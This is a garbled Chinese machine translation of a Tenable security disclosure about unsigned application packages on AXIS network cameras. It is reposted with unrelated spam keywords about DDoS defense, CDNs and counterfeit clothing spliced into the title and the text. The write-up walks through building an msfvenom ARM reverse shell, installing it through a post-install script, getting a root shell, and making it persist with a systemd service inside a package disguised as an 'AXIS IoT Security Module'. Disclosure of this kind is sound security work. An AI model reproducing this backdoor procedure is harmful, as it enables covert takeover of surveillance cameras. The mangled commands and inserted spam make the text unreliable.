来自 安全 2021-10-13 04:21 的文章

ddos防御工具_高仿衣服哪里的货最好_无缝切换

ddos防御工具_高仿衣服哪里的货最好_无缝切换

Tenable Research最近对AXIS M3044-V网络摄像头进行了审计,了解到AXIS已经为他们的摄像头引入了一个应用平台。这款相机甚至预装了一款应用程序:AXIS视频运动检测。在审计过程中,我们发现恶意参与者有可能篡改固件并用恶意软件包替换它。你需要知道什么?Tenable Research发现,AXIS M3044-V网络摄像头中使用的底层操作系统可能被篡改,并被恶意软件包替换。攻击向量是什么?使用AXIS摄像头应用平台,敌对方可以创建并安装未签名的应用程序包。这需要经过身份验证的访问,但是一旦恶意参与者通过社会工程或供应链获得了它,他们将拥有对设备的完全根访问权限。对业务有何影响?恶意软件包可用于将恶意软件分发给合法用户,或作为执行横向传输的轴心点。物理安全和闭路电视操作也可能受到损害。解决办法是什么?目前没有供应商提供的解决方案。目前销售的所有AXIS摄像头都支持第三方软件包的安装。Tenable建议在分段网络中部署受影响的设备,并限制对经批准的用户的访问。背景AxisM3044-V是一款联网的小型半球监控摄像机,面向商店、酒店、学校、银行和办公室,用于物理安全和闭路电视监控。AXIS Camera Application Platform(ACAP)是一个开放的应用程序平台,它使第三方开发者能够开发可以安装在AXIS网络摄像机和视频编码器上的应用程序。从攻击者的角度来看,家庭防御ddos,嵌入式设备上的应用程序平台很有趣,因为它可以使恶意软件的分发和安装变得容易。创建自定义恶意固件既费时又困难。此外,许多嵌入式系统需要数字签名固件,至少可以说,这给攻击者带来了真正的挑战。您可能会认为,ddos最好的防御方式,一个编写良好的应用程序平台也需要签名的应用程序。让我们看看轴心国做了什么。分析我们首先需要知道的是AXIS对应用程序的格式要求。从下面的图像中,您可以看到相机期望应用程序具有eap扩展。谢天谢地,由于相机预装了应用程序,您可以在固件中找到eap文件。eap原来只是gzip压缩的tar。阿尔比诺罗布斯特@ubuntu:~/\u M3044-V_8_10_1。提取的箱子$查找。|格雷普eap./ubifs root/usr/share/packages/AXIS_Video_运动_检测_4_2_0_armv7氢氟酸阿尔比诺罗布斯特@ubuntu:~/\u M3044-V_8_10_1。提取的箱子$file./ubifs root/usr/share/packages/AXIS_Video_Motion_检测_4_2_0_armv7氢氟酸./ubifs root/usr/share/packages/AXIS_Video_运动_检测_4_2_0_armv7氢氟酸:gzip压缩数据,上次修改时间:2017年12月19日星期二15:24:07,来自Unix解压后,便宜高防CDN,这个包显示了一个相当简单的格式:一个二进制文件、几个配置文件和一些HTML。阿尔比诺罗布斯特@ubuntu:~/\u M3044-V_8_10_1。提取/分解$ls-l美元总计468-rw-r--r--1阿尔比诺布斯特阿尔比诺布斯特12月27日19:15cgi.txt文件drwxr-xr-x 6 albinolobster 4096 Dec 19 10:22 html-rw-r--r--1阿尔比诺布斯特585年12月19日10:24包.conf-rw-r--r--1阿尔比诺布斯特阿尔比诺布斯特0年12月19日10:15参数配置-rwxr-xr-x 1 albinolobster albinolobster 465972 12月19日10:24 vmd阿尔比诺罗布斯特@ubuntu:~/\u M3044-V_8_10_1。提取/分解$file vmd文件vmd:ELF 32位LSB可执行文件,ARM,EABI5版本1(SYSV),动态链接,解释器/lib/ld linux-armhf.so.公司.3,对于GNU/Linux 3.10.0,剥离这个包.conf文件似乎包含安装和执行vmd二进制文件的所有指令。阿尔比诺罗布斯特@ubuntu:~/\u M3044-V_8_10_1。提取/分解$猫包.confPACKAGENAME="轴视频运动检测"MENUNAME="运动检测"APPTYPE="armv7hf"APPNAME="vmd"APPID="143440"LICENSEPAGE="无"VENDOR="安讯士通信"REQEMBDEVVERSION="2.12"APPMAJORVERSION="4"APPMINORVERSION="2"应用程序版本="0"APPGRP="sdk"APPUSR="sdk"APPOPTS=""其他文件=""设置页面文件="配置.html"SETTINGSPAGETEXT="轴视频运动检测设置"VENDORHOMEPAGELINK='www.axis.com网站'POSTINSTALLSCRIPT=""STARTMODE="重生"HttpCGipath="cgi.txt文件"证书集名称=""CERTSETACTOR=""CERTSETPROTOCOL=""创建自定义应用程序的明显方法是简单地用我们自己的二进制文件替换vmd。根据这个目标,我使用msfvenom生成了一个小endian ARM reverse shell来替换vmd。我重新压缩了这个包并试图上传它。不幸的是,我收到一封"没用!"错误消息。申请书可以用某种方式签字吗?也许有一个API需要二进制代码遵循?在跑进兔子洞之前,让我们看看包.conf。听起来它会执行我们选择的脚本,对吧?为了测试这一点,我将vmd二进制文件返回到其原始状态,并将我的reverse shell重命名为rev_外壳.bin,创建了一个名为rev的bash脚本_外壳.sh执行反向shell并更改包.conf要包含的文件POSTINSTALLSCRIPT="rev_外壳.sh."重新打包eap并上传后,我收到了:msf exploit(multi/handler)>漏洞利用[*]在192.168.1.222:1270上启动反向TCP处理程序[*]命令shell会话15于2018-01-29 09:39:35-0500打开(192.168.1.222:1270->192.168.1.183:46518)身份证件uid=0(根)gid=0(根)看来我们不必担心任何类型的包签名。另外,值得注意的是,我们重写了原始的VMD安装。相当整洁!现在的问题是我们的反向shell只在安装后才启动。这意味着任何类型的重启都会切断我们与摄像机的连接。另外,由于我们重写了VMD,将来的更新可能会删除我们的修改。让我们看看我们是否可以自己设计应用程序来解决这些问题。因为这不是一个秘密的尝试,避免被未来更新覆盖的第一步是创建我们自己的应用程序。这很容易通过更改配置文件中的几个项来完成。由于我们的目标是让不知情的第三方安装我们的应用程序(如果我们正在遭受某种供应链攻击,则不删除),我们将为应用程序命名为"AXIS IoT安全模块",并适当重命名vmd:PACKAGENAME="AXIS IoT安全模块"MENUNAME="物联网安全"APPTYPE="armv7hf"APPNAME="物联网安全"APPID="143441"LICENSEPAGE="无"VENDOR="安讯士通信"REQEMBDEVVERSION="2.12"APPMAJORVERSION="1"APPMINORVERSION="0"应用程序版本="0"我们的另一半问题是坚持。同样,由于隐身不是一个目标,你可以像系统的其他部分一样使用systemd。将reverse shell重命名为security\u daemon并创建以下服务文件:[单位]Description=iot_安全性_守护程序之后=httpd.服务[服务]类型=简单ExecStart=/usr/local/packages/iot_security/security_守护程序重新启动=始终[安装]WantedBy=多个-用户.目标接下来,更新安装后脚本以向systemd注册反向shell:#!/垃圾箱/垃圾箱cp/usr/local/packages/iot_安全性/iot_安全性_守护程序.service/etc/系统D/系统/&&systemctl后台程序重新加载&&systemctl启用物联网安全_守护程序.service&&systemctl启动物联网安全_守护程序.service你可以走了。将所有文件重新打包到eap中,您将再次得到一个反向shell。现在,如果相机重新启动或固件更新,外壳会重新启动。但是,请注意,反向外壳将无法在工厂重置后存活。供应商回复我们最初在2017年8月下旬向安讯士公司报告了这些调查结果和其他政策。经过一番讨论,他们的最后陈述如下:关于ACAP的安全问题,你所说的所有观点都是有效的,在当今这个充满欺诈、诡诈的应用程序网站和网络钓鱼者的世界里并非完全不可行。尽管经过一些内部讨论,目前对ACAP问题的立场是,我们不会就此发表咨询意见。SDK的大多数开发人员都了解这些限制,并且与其他问题不同,棋牌游戏高防cdn,在不破坏兼容性的情况下,没有简单的解决方案。(除了在所有下载链接上发布SHA256校验和,正如您所指出的,这是不够的)。我们计划在下一代ACAP平台中解决这一问题,该平台将提供签署ACAP的规定。如果你有强烈的感觉,请告诉我们。AXIS ACAP(截至目前)的分布范围并不像Play/App stores那样广泛,但没错,我完全同意签名是我们需要在未来版本中实现的一项重要改进。业务影响安装在摄像头上的恶意软件包可用于将恶意软件分发给合法用户,或作为执行横向传输的支点。物理安全和闭路电视操作也可能受到损害。解决方案虽然Tenable目前不提供直接检查固件被篡改的插件,但我们的AXIS web界面检测插件将帮助客户识别部署的AXIS摄像头,国内高防CDN评价,以确定他们是否受到此类攻击。Tenable建议将受影响的设备部署在具有访问和身份验证控制的分段网络中,以将使用限制为批准的用户。